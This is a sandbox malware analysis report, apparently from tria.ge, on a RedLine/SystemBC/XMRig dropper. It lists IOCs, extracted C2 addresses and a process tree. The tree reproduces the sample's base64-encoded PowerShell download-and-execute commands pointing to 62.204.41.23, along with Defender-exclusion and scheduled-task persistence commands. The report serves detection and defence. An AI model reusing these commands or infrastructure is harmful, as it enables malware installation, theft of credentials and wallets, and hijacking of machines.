Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
06/05/2023, 12:26
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230220-en
General
-
Target
file.exe
-
Size
93KB
-
MD5
97a78d084446851cb1e74b4bb2045f3a
-
SHA1
efdf7e05c2d0b7993d6f4ce6642f2f536116ad36
-
SHA256
e0e267a1da22b796f4f8a7b84a81d0f0a461183cdc03d267a75e34d9fc497ccd
-
SHA512
d81e584282ba21f5b821e6c237ab5aeb987b009d689eb503f1f7019bb7698f5345a43b470390521928ebb16ca9ac8b6876387fd3987a501ab129e8661d93df2c
-
SSDEEP
1536:88bw0uWZGvOZnnlJ5t9UxrAwIVtdSDMvNcNIOOnQl+sb9m+dUs:bbhf5nj1wIvdSDMvNcNIObQso+d9
Malware Config
Extracted
http://62.204.41.23/file.png
Extracted
http://62.204.41.23/r.png
Extracted
http://62.204.41.23/o.png
Extracted
redline
[ PRO ]
185.161.248.16:26885
-
auth_value
b4958da54d1cdd9d9b28330afda1cc3c
Extracted
systembc
185.161.248.16:4440
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
description pid Process procid_target PID 2928 created 3120 2928 OneDrive.exe 55 PID 2928 created 3120 2928 OneDrive.exe 55 PID 2928 created 3120 2928 OneDrive.exe 55 PID 4400 created 3120 4400 OneDrive.exe 55 PID 4400 created 3120 4400 OneDrive.exe 55 PID 4400 created 3120 4400 OneDrive.exe 55 PID 4400 created 3120 4400 OneDrive.exe 55 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe -
XMRig Miner payload 13 IoCs
resource yara_rule behavioral2/memory/4400-278-0x00007FF7F1B50000-0x00007FF7F251A000-memory.dmp xmrig behavioral2/memory/4832-308-0x00007FF7D7B10000-0x00007FF7D82FF000-memory.dmp xmrig behavioral2/memory/4832-312-0x00007FF7D7B10000-0x00007FF7D82FF000-memory.dmp xmrig behavioral2/memory/4832-317-0x00007FF7D7B10000-0x00007FF7D82FF000-memory.dmp xmrig behavioral2/memory/4832-321-0x00007FF7D7B10000-0x00007FF7D82FF000-memory.dmp xmrig behavioral2/memory/4832-326-0x00007FF7D7B10000-0x00007FF7D82FF000-memory.dmp xmrig behavioral2/memory/4832-330-0x00007FF7D7B10000-0x00007FF7D82FF000-memory.dmp xmrig behavioral2/memory/4832-334-0x00007FF7D7B10000-0x00007FF7D82FF000-memory.dmp xmrig behavioral2/memory/4832-338-0x00007FF7D7B10000-0x00007FF7D82FF000-memory.dmp xmrig behavioral2/memory/4832-342-0x00007FF7D7B10000-0x00007FF7D82FF000-memory.dmp xmrig behavioral2/memory/4832-346-0x00007FF7D7B10000-0x00007FF7D82FF000-memory.dmp xmrig behavioral2/memory/4832-350-0x00007FF7D7B10000-0x00007FF7D82FF000-memory.dmp xmrig behavioral2/memory/4832-354-0x00007FF7D7B10000-0x00007FF7D82FF000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
flow pid Process 1 348 powershell.exe 2 3956 powershell.exe 3 4476 powershell.exe 34 4476 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dllhost.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation lsass.exe -
Executes dropped EXE 5 IoCs
pid Process 2928 OneDrive.exe 216 dllhost.exe 4400 OneDrive.exe 1872 lsass.exe 1040 lsass.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Wine dllhost.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Roaming\\dllhost.exe'\"" dllhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" lsass.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Windows\CurrentVersion\Run dllhost.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 216 dllhost.exe 1872 lsass.exe 1872 lsass.exe 1040 lsass.exe 1040 lsass.exe 1040 lsass.exe 1040 lsass.exe 1040 lsass.exe 1040 lsass.exe 1040 lsass.exe 1040 lsass.exe 1040 lsass.exe 1040 lsass.exe 1040 lsass.exe 1040 lsass.exe 1040 lsass.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 348 set thread context of 3768 348 powershell.exe 91 PID 3956 set thread context of 2772 3956 powershell.exe 93 PID 4400 set thread context of 4816 4400 OneDrive.exe 122 PID 4400 set thread context of 4832 4400 OneDrive.exe 123 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 RegSvcs.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegSvcs.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 464 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 212 timeout.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1040 lsass.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 3956 powershell.exe 4476 powershell.exe 348 powershell.exe 320 powershell.exe 348 powershell.exe 320 powershell.exe 3956 powershell.exe 4476 powershell.exe 3956 powershell.exe 3956 powershell.exe 2772 RegSvcs.exe 2928 OneDrive.exe 2928 OneDrive.exe 2928 OneDrive.exe 2928 OneDrive.exe 3408 powershell.exe 3408 powershell.exe 216 dllhost.exe 216 dllhost.exe 2928 OneDrive.exe 2928 OneDrive.exe 4400 OneDrive.exe 4400 OneDrive.exe 4400 OneDrive.exe 4400 OneDrive.exe 4108 powershell.exe 4108 powershell.exe 4108 powershell.exe 4400 OneDrive.exe 4400 OneDrive.exe 2772 RegSvcs.exe 4400 OneDrive.exe 4400 OneDrive.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3956 powershell.exe Token: SeDebugPrivilege 4476 powershell.exe Token: SeDebugPrivilege 348 powershell.exe Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 3768 RegSvcs.exe Token: SeDebugPrivilege 2772 RegSvcs.exe Token: SeDebugPrivilege 3408 powershell.exe Token: SeShutdownPrivilege 2648 powercfg.exe Token: SeCreatePagefilePrivilege 2648 powercfg.exe Token: SeShutdownPrivilege 2716 powercfg.exe Token: SeCreatePagefilePrivilege 2716 powercfg.exe Token: SeShutdownPrivilege 4204 powercfg.exe Token: SeCreatePagefilePrivilege 4204 powercfg.exe Token: SeShutdownPrivilege 3432 powercfg.exe Token: SeCreatePagefilePrivilege 3432 powercfg.exe Token: SeIncreaseQuotaPrivilege 3408 powershell.exe Token: SeSecurityPrivilege 3408 powershell.exe Token: SeTakeOwnershipPrivilege 3408 powershell.exe Token: SeLoadDriverPrivilege 3408 powershell.exe Token: SeSystemProfilePrivilege 3408 powershell.exe Token: SeSystemtimePrivilege 3408 powershell.exe Token: SeProfSingleProcessPrivilege 3408 powershell.exe Token: SeIncBasePriorityPrivilege 3408 powershell.exe Token: SeCreatePagefilePrivilege 3408 powershell.exe Token: SeBackupPrivilege 3408 powershell.exe Token: SeRestorePrivilege 3408 powershell.exe Token: SeShutdownPrivilege 3408 powershell.exe Token: SeDebugPrivilege 3408 powershell.exe Token: SeSystemEnvironmentPrivilege 3408 powershell.exe Token: SeRemoteShutdownPrivilege 3408 powershell.exe Token: SeUndockPrivilege 3408 powershell.exe Token: SeManageVolumePrivilege 3408 powershell.exe Token: 33 3408 powershell.exe Token: 34 3408 powershell.exe Token: 35 3408 powershell.exe Token: 36 3408 powershell.exe Token: SeIncreaseQuotaPrivilege 3408 powershell.exe Token: SeSecurityPrivilege 3408 powershell.exe Token: SeTakeOwnershipPrivilege 3408 powershell.exe Token: SeLoadDriverPrivilege 3408 powershell.exe Token: SeSystemProfilePrivilege 3408 powershell.exe Token: SeSystemtimePrivilege 3408 powershell.exe Token: SeProfSingleProcessPrivilege 3408 powershell.exe Token: SeIncBasePriorityPrivilege 3408 powershell.exe Token: SeCreatePagefilePrivilege 3408 powershell.exe Token: SeBackupPrivilege 3408 powershell.exe Token: SeRestorePrivilege 3408 powershell.exe Token: SeShutdownPrivilege 3408 powershell.exe Token: SeDebugPrivilege 3408 powershell.exe Token: SeSystemEnvironmentPrivilege 3408 powershell.exe Token: SeRemoteShutdownPrivilege 3408 powershell.exe Token: SeUndockPrivilege 3408 powershell.exe Token: SeManageVolumePrivilege 3408 powershell.exe Token: 33 3408 powershell.exe Token: 34 3408 powershell.exe Token: 35 3408 powershell.exe Token: 36 3408 powershell.exe Token: SeIncreaseQuotaPrivilege 3408 powershell.exe Token: SeSecurityPrivilege 3408 powershell.exe Token: SeTakeOwnershipPrivilege 3408 powershell.exe Token: SeLoadDriverPrivilege 3408 powershell.exe Token: SeSystemProfilePrivilege 3408 powershell.exe Token: SeSystemtimePrivilege 3408 powershell.exe Token: SeProfSingleProcessPrivilege 3408 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe 4832 conhost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1872 lsass.exe 1040 lsass.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3936 wrote to memory of 320 3936 file.exe 83 PID 3936 wrote to memory of 320 3936 file.exe 83 PID 3936 wrote to memory of 348 3936 file.exe 86 PID 3936 wrote to memory of 348 3936 file.exe 86 PID 3936 wrote to memory of 4476 3936 file.exe 84 PID 3936 wrote to memory of 4476 3936 file.exe 84 PID 3936 wrote to memory of 3956 3936 file.exe 85 PID 3936 wrote to memory of 3956 3936 file.exe 85 PID 348 wrote to memory of 3768 348 powershell.exe 91 PID 348 wrote to memory of 3768 348 powershell.exe 91 PID 348 wrote to memory of 3768 348 powershell.exe 91 PID 348 wrote to memory of 3768 348 powershell.exe 91 PID 348 wrote to memory of 3768 348 powershell.exe 91 PID 348 wrote to memory of 3768 348 powershell.exe 91 PID 348 wrote to memory of 3768 348 powershell.exe 91 PID 348 wrote to memory of 3768 348 powershell.exe 91 PID 3956 wrote to memory of 2668 3956 powershell.exe 92 PID 3956 wrote to memory of 2668 3956 powershell.exe 92 PID 3956 wrote to memory of 2668 3956 powershell.exe 92 PID 3956 wrote to memory of 2772 3956 powershell.exe 93 PID 3956 wrote to memory of 2772 3956 powershell.exe 93 PID 3956 wrote to memory of 2772 3956 powershell.exe 93 PID 3956 wrote to memory of 2772 3956 powershell.exe 93 PID 3956 wrote to memory of 2772 3956 powershell.exe 93 PID 3956 wrote to memory of 2772 3956 powershell.exe 93 PID 3956 wrote to memory of 2772 3956 powershell.exe 93 PID 3956 wrote to memory of 2772 3956 powershell.exe 93 PID 4476 wrote to memory of 2928 4476 powershell.exe 98 PID 4476 wrote to memory of 2928 4476 powershell.exe 98 PID 788 wrote to memory of 2648 788 cmd.exe 103 PID 788 wrote to memory of 2648 788 cmd.exe 103 PID 788 wrote to memory of 2716 788 cmd.exe 105 PID 788 wrote to memory of 2716 788 cmd.exe 105 PID 788 wrote to memory of 4204 788 cmd.exe 106 PID 788 wrote to memory of 4204 788 cmd.exe 106 PID 788 wrote to memory of 3432 788 cmd.exe 108 PID 788 wrote to memory of 3432 788 cmd.exe 108 PID 4476 wrote to memory of 216 4476 powershell.exe 109 PID 4476 wrote to memory of 216 4476 powershell.exe 109 PID 4476 wrote to memory of 216 4476 powershell.exe 109 PID 4476 wrote to memory of 1872 4476 powershell.exe 113 PID 4476 wrote to memory of 1872 4476 powershell.exe 113 PID 4476 wrote to memory of 1872 4476 powershell.exe 113 PID 4828 wrote to memory of 2888 4828 cmd.exe 116 PID 4828 wrote to memory of 2888 4828 cmd.exe 116 PID 4828 wrote to memory of 1544 4828 cmd.exe 119 PID 4828 wrote to memory of 1544 4828 cmd.exe 119 PID 4828 wrote to memory of 960 4828 cmd.exe 120 PID 4828 wrote to memory of 960 4828 cmd.exe 120 PID 4828 wrote to memory of 4804 4828 cmd.exe 121 PID 4828 wrote to memory of 4804 4828 cmd.exe 121 PID 4400 wrote to memory of 4816 4400 OneDrive.exe 122 PID 4400 wrote to memory of 4832 4400 OneDrive.exe 123 PID 1872 wrote to memory of 464 1872 lsass.exe 124 PID 1872 wrote to memory of 464 1872 lsass.exe 124 PID 1872 wrote to memory of 464 1872 lsass.exe 124 PID 1872 wrote to memory of 1040 1872 lsass.exe 126 PID 1872 wrote to memory of 1040 1872 lsass.exe 126 PID 1872 wrote to memory of 1040 1872 lsass.exe 126 PID 1872 wrote to memory of 1532 1872 lsass.exe 127 PID 1872 wrote to memory of 1532 1872 lsass.exe 127 PID 1872 wrote to memory of 1532 1872 lsass.exe 127 PID 1532 wrote to memory of 212 1532 cmd.exe 129 PID 1532 wrote to memory of 212 1532 cmd.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3120
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2928
-
-
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:216
-
-
C:\Users\Admin\AppData\Roaming\lsass.exe"C:\Users\Admin\AppData\Roaming\lsass.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 14:31 /du 23:59 /sc daily /ri 1 /f5⤵
- Creates scheduled task(s)
PID:464
-
-
C:\ProgramData\lsass\lsass.exe"C:\ProgramData\lsass\lsass.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFA14.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\SysWOW64\timeout.exetimeout 76⤵
- Delays execution with timeout.exe
PID:212
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:2668
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:3768
-
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4204
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "OneDrive"2⤵PID:4968
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2888
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1544
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:960
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:4804
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4108
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:4816
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4832
-
-
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4400
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
410B
MD524cfd42a8de70b38ed70e1f8cf4eda1c
SHA1e447168fd38da9175084b36a06c3e9bbde99064c
SHA25693b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA5125c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875
-
Filesize
1KB
MD50c9e4a5091153aad3afaf5372fbb07a0
SHA1dbe1fc5ac93d241d51311f638d8a386f01bf25aa
SHA256f88bdcf6352355427dc31af5f99817e7ead0349ba5b17e0dc5331ad424e7b6e4
SHA5123e0811a82f7eb57c32e3eaeee734951c93ea3616476fa3e52ebb135de41ead7855db5539f991f6826568fc4d658fa7a266fdfe4e3840bdb9813005d6e7ee746e
-
Filesize
1KB
MD5f1549cc7b079aafe5a84d4589e478849
SHA17b075f7b88d8a2c5d9cd27090a514d60de5bbd4d
SHA2566adfd6fd5b210f2cbf2ca9f3a89a27c937fba828a9c00888c1c3f86c6c4b38d5
